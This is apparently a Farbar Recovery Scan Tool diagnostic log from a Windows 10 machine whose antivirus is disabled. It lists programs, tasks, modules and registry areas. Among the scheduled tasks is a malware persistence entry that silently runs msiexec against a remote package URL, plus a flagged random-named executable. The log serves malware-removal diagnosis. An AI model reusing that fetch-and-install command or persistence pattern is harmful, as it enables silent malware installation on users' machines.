Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30.01.2019 Ran by flipp (31-01-2019 13:27:28) Running from C:\Users\flipp\Desktop Windows 10 Home Single Language Version 1803 17134.523 (X64) (2018-08-16 11:24:28) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrador (S-1-5-21-1103162910-2907697783-2557054662-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1103162910-2907697783-2557054662-503 - Limited - Disabled) flipp (S-1-5-21-1103162910-2907697783-2557054662-1001 - Administrator - Enabled) => C:\Users\flipp Invitado (S-1-5-21-1103162910-2907697783-2557054662-501 - Limited - Disabled) WDAGUtilityAccount (S-1-5-21-1103162910-2907697783-2557054662-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: VirusScan de McAfee (Disabled - Up to date) {8BCDACFA-D264-3528-5EF8-E94FD0BC1FBC} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: VirusScan de McAfee (Disabled - Up to date) {30AC4D1E-F45E-3AA6-6448-D23DAB3B5501} FW: McAfee Firewall (Enabled) {B3F62DDF-980B-3470-75A7-407A2E6F58C7} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\uTorrent) (Version: 3.5.4.44846 - BitTorrent Inc.) Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20069 - Adobe Systems Incorporated) Apple Application Support (32 bits) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64 bits) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) BS.Player PRO (HKLM-x32\...\BSPlayerp) (Version: 2.73.1083 - AB Team, d.o.o.) Camtasia Studio 7 (HKLM-x32\...\{C0E8FE43-C35B-451D-B35F-D4BD056D70E7}) (Version: 7.1.1 - TechSmith Corporation) CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform) Defraggler (HKLM\...\Defraggler) (Version: 2.22 - Piriform) Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.64 - Synaptics Incorporated) Eines de correcció del Microsoft Office 2013: català (HKLM\...\{90150000-001F-0403-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Ferramentas de verificación de Microsoft Office 2013 - Galego (HKLM\...\{90150000-001F-0456-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation) iTunes (HKLM\...\{514BCD3A-B38B-4835-8B8C-69DA8C48A7A7}) (Version: 12.9.3.3 - Apple Inc.) Java 8 Update 201 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180201F0}) (Version: 8.0.2010.9 - Oracle Corporation) KeePass Password Safe 2.41 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.41 - Dominik Reichl) Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.6.9060.3 - Waves Audio Ltd.) Hidden McAfee AntiVirus Plus (HKLM-x32\...\MSC) (Version: 16.0 R17 - McAfee, Inc.) McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.0.17 - McAfee, Inc.) Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\OneDriveSetup.exe) (Version: 18.240.1202.0004 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Mozilla Firefox 65.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 65.0 (x64 es-MX)) (Version: 65.0 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0 - Mozilla) Mp3tag v2.90a (HKLM-x32\...\Mp3tag) (Version: 2.90a - Florian Heidenreich) NetSpot (HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\a6e43da6e76c5494) (Version: 2.10.1.680 - Etwok LLC) Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.5.9 - Notepad++ Team) Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation) Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8142 - Realtek Semiconductor Corp.) Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft) Speccy (HKLM\...\Speccy) (Version: 1.32 - Piriform) Syncios 6.5.4 (HKLM-x32\...\Syncios) (Version: 6.5.4 - Anvsoft) Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft) Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft) Update for Skype for Business 2015 (KB4461557) 64-Bit Edition (HKLM\...\{90150000-012B-0C0A-1000-0000000FF1CE}_Office15.PROPLUS_{06CB9397-D762-4A2F-8D91-DFAD58D2BAED}) (Version: - Microsoft) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation) WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH) WinSnap (HKLM-x32\...\WinSnap) (Version: 4.6.4 - NTWind Software) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001_Classes\CLSID\{6eb1ea83-c3dd-47a2-b938-4a1e7d2d3bef}\InprocServer32 -> C:\Windows\system32\dfshim.dll (Microsoft Corporation) ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-07-22] () ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd) ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\program files\mcafee\msc\mcctxmenufrmwrk.dll [2018-11-27] (McAfee, Inc.) ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich) ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2018-07-12] (Florian Heidenreich) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2016-11-01] (Intel Corporation) ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2018-05-02] (Piriform Ltd) ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\program files\mcafee\msc\mcctxmenufrmwrk.dll [2018-11-27] (McAfee, Inc.) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (Alexander Roshal) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0C10A8FC-458B-4F7D-A9A4-FF4C2E1F873D} - System32\Tasks\{A7A4C55F-20E4-9E84-7E16-07D912FEBD60} => C:\Windows\SysWOW64\NNbIJUy.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION Task: {0F5E203D-524C-4DE2-BBC2-6D952681EB03} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2018-11-13] (McAfee, Inc.) Task: {1082CF4F-B353-43BC-AD84-480C08E49A6B} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [2018-10-30] (McAfee, Inc.) Task: {116272AA-9995-406C-8179-1167A773A38F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {20B00A05-7D0F-4994-9651-BE709626197A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: {20EB9757-8CE3-4386-872A-82588D412DA9} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2018-01-08] (Apple Inc.) Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-11] () Task: {684A5822-1CE1-4E77-82DC-813E520B6C18} - System32\Tasks\{72514941-C9C4-3690-D439-6D98DEEB0584} => "msiexec" -package hxxps://refreshnerer711.info/ZUY1oNVES.yVs /q Task: {6EDEDCB9-AE0E-494C-9579-A5408D43C84B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {855FBB8C-3FD3-4CE9-B985-7DDD0723012F} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation) Task: {8862E9D1-31A5-46FB-B3AB-01BBD35858D2} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd) Task: {B1A651FC-1EBF-4985-87E8-F39E839083E9} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2019-01-10] (Piriform Ltd) Task: {BF533E2F-BCB7-47E2-B48F-5E6735A73CA2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation) Task: {CF183B1C-AA1F-4381-9DA5-AF991EB7D247} - System32\Tasks\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.6.319\mcdatrep.exe [2018-09-11] (McAfee, LLC.) Task: {CF4BCF28-4F56-482A-B758-248EE7AF2ABE} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. <==== ATTENTION Task: {E284EAE7-2238-47E7-BDC6-54F7172820E0} - System32\Tasks\McAfee\McAfee Idle Detection Task Task: {E2C44D4D-F556-443A-A5F1-540E1EA68FC1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2018-10-21 02:17 - 2018-10-21 02:17 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2018-06-29 14:34 - 2018-06-29 14:34 - 000896136 _____ () C:\Program Files\Common Files\McAfee\CSP\3.0.127.0\McCSPMsgBusDLL.dll 2018-04-11 17:34 - 2018-04-11 17:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll 2016-11-01 15:05 - 2016-11-01 15:05 - 000401896 _____ () C:\Windows\system32\igfxTray.exe 2018-04-11 17:34 - 2018-04-11 17:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll 2018-12-11 20:42 - 2018-11-08 20:17 - 002759680 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll 2018-07-22 18:14 - 2018-07-22 18:14 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll 2019-01-09 12:58 - 2019-01-01 00:42 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2018-10-15 14:18 - 2018-10-15 14:19 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\ChakraBridge.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 000019456 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\SkypeProxiesAndStubs.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 010936320 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\LibWrapper.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 002920960 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\skypert.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 000688128 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll 2018-12-14 14:28 - 2018-12-14 14:31 - 002384384 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\Processing.NDI.Lib.UWP.x64.dll 2018-08-16 13:35 - 2018-08-16 13:35 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 000182272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.37.98.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe 2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 028012544 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Video.UI.exe 2019-01-22 15:39 - 2019-01-22 15:40 - 000305152 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\SharedUI.dll 2018-04-12 10:27 - 2018-04-12 10:27 - 000902656 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.UI.Xaml.dll 2018-11-28 11:47 - 2018-11-28 11:48 - 004202208 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll 2019-01-22 15:39 - 2019-01-22 15:40 - 006187520 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\EntCommon.dll 2019-01-22 15:39 - 2019-01-22 15:39 - 009388544 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.18112.14311.0_x64__8wekyb3d8bbwe\EntPlat.dll 2018-06-29 00:26 - 2018-06-29 00:26 - 002443384 _____ () C:\Program Files (x86)\Anvsoft\Syncios\SynciosDeviceService.exe 2018-07-30 01:42 - 2018-07-30 01:42 - 000017016 _____ () C:\Program Files (x86)\Anvsoft\Syncios\androidnotifier.exe 2018-06-27 20:17 - 2018-06-27 20:17 - 001091896 _____ () C:\Program Files (x86)\Anvsoft\Syncios\adb.exe 2019-01-02 04:28 - 2019-01-02 04:28 - 000059376 _____ () C:\Program Files\CCleaner\branding.dll 2019-01-10 04:01 - 2019-01-10 04:01 - 000103560 _____ () C:\Program Files\CCleaner\lang\lang-1034.dll 2019-01-16 21:17 - 2019-01-16 21:18 - 000478720 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe 2019-01-16 21:17 - 2019-01-16 21:17 - 065903104 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll 2018-08-16 13:29 - 2018-08-16 13:32 - 002523136 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll 2019-01-16 21:17 - 2019-01-16 21:18 - 000012288 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll 2018-11-15 16:19 - 2018-11-15 16:20 - 003715072 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll 2018-11-15 16:19 - 2018-11-15 16:20 - 000036352 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\WinMLWrapper.UWP.dll 2018-08-16 13:29 - 2018-08-16 13:32 - 002480640 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\opencv_imgproc320.dll 2018-08-16 13:29 - 2018-08-16 13:32 - 002280960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\opencv_core320.dll 2018-08-16 13:29 - 2018-08-16 13:32 - 002283008 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\TrackingDLLUWP.dll 2019-01-16 21:17 - 2019-01-16 21:17 - 014186496 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll 2018-11-15 16:19 - 2018-11-15 16:20 - 003569152 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\MediaEngine.dll 2019-01-16 21:17 - 2019-01-16 21:18 - 002871296 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll 2018-09-03 12:12 - 2018-09-03 12:14 - 000973312 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll 2018-08-16 13:29 - 2018-08-16 13:32 - 004584960 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.18112.20010.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll 2018-12-11 20:18 - 2018-12-11 20:18 - 004220928 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1811.3241.0_x64__8wekyb3d8bbwe\Calculator.exe 2018-12-11 20:15 - 2018-12-11 20:15 - 004380232 _____ () C:\Program Files\WindowsApps\Microsoft.UI.Xaml.2.0_2.1810.18003.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll 2018-09-11 20:38 - 2018-06-20 15:22 - 064144704 _____ () C:\Program Files\Common Files\McAfee\CEF\libcef.dll 2018-07-30 01:48 - 2018-07-30 01:48 - 001514496 _____ () C:\Program Files (x86)\Anvsoft\Syncios\DuiLib.dll 2018-07-30 01:42 - 2018-07-30 01:42 - 000075264 _____ () C:\Program Files (x86)\Anvsoft\Syncios\generalFunc_pdt.dll 2018-07-30 01:42 - 2018-07-30 01:42 - 001309184 _____ () C:\Program Files (x86)\Anvsoft\Syncios\androidSyncCore_pdm.dll 2018-07-30 01:42 - 2018-07-30 01:42 - 000178688 _____ () C:\Program Files (x86)\Anvsoft\Syncios\driverMgr4Transfer_pdm.dll 2017-10-29 18:38 - 2017-10-29 18:38 - 000571392 _____ () C:\Program Files (x86)\Anvsoft\Syncios\sqlite3.dll 2017-10-29 18:40 - 2017-10-29 18:40 - 000592896 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libsscan.dll 2017-11-05 21:28 - 2017-11-05 21:28 - 013524469 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libheic.dll 2018-03-14 18:55 - 2018-03-14 18:55 - 001487360 _____ () C:\Program Files (x86)\Anvsoft\Syncios\exiv2.dll 2017-10-29 18:42 - 2017-10-29 18:42 - 001970688 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libplist.dll 2017-10-29 18:38 - 2017-10-29 18:38 - 001042432 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libandroidrecovery.dll 2018-07-30 01:42 - 2018-07-30 01:42 - 001278072 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libandroidnotifier.dll 2017-10-30 02:06 - 2017-10-30 02:06 - 004554857 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libexiv2.dll 2017-10-30 02:06 - 2017-10-30 02:06 - 000121524 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libgcc_s_dw2-1.dll 2017-10-30 02:06 - 2017-10-30 02:06 - 001544523 _____ () C:\Program Files (x86)\Anvsoft\Syncios\libstdc++-6.dll 2018-03-14 18:55 - 2018-03-14 18:55 - 000104448 _____ () C:\Program Files (x86)\Anvsoft\Syncios\expat.dll 2017-10-29 18:41 - 2017-10-29 18:41 - 000066048 _____ () C:\Program Files (x86)\Anvsoft\Syncios\zlib1.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2017-10-29 18:41 - 2017-10-29 18:41 - 000671744 _____ () C:\Program Files (x86)\Anvsoft\Syncios\hashAB.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\webcompanion.com -> hxxp://webcompanion.com ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2018-04-11 17:38 - 2018-04-11 17:36 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\ HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\flipp\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper DNS Servers: 200.52.196.196 - 189.194.232.137 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) 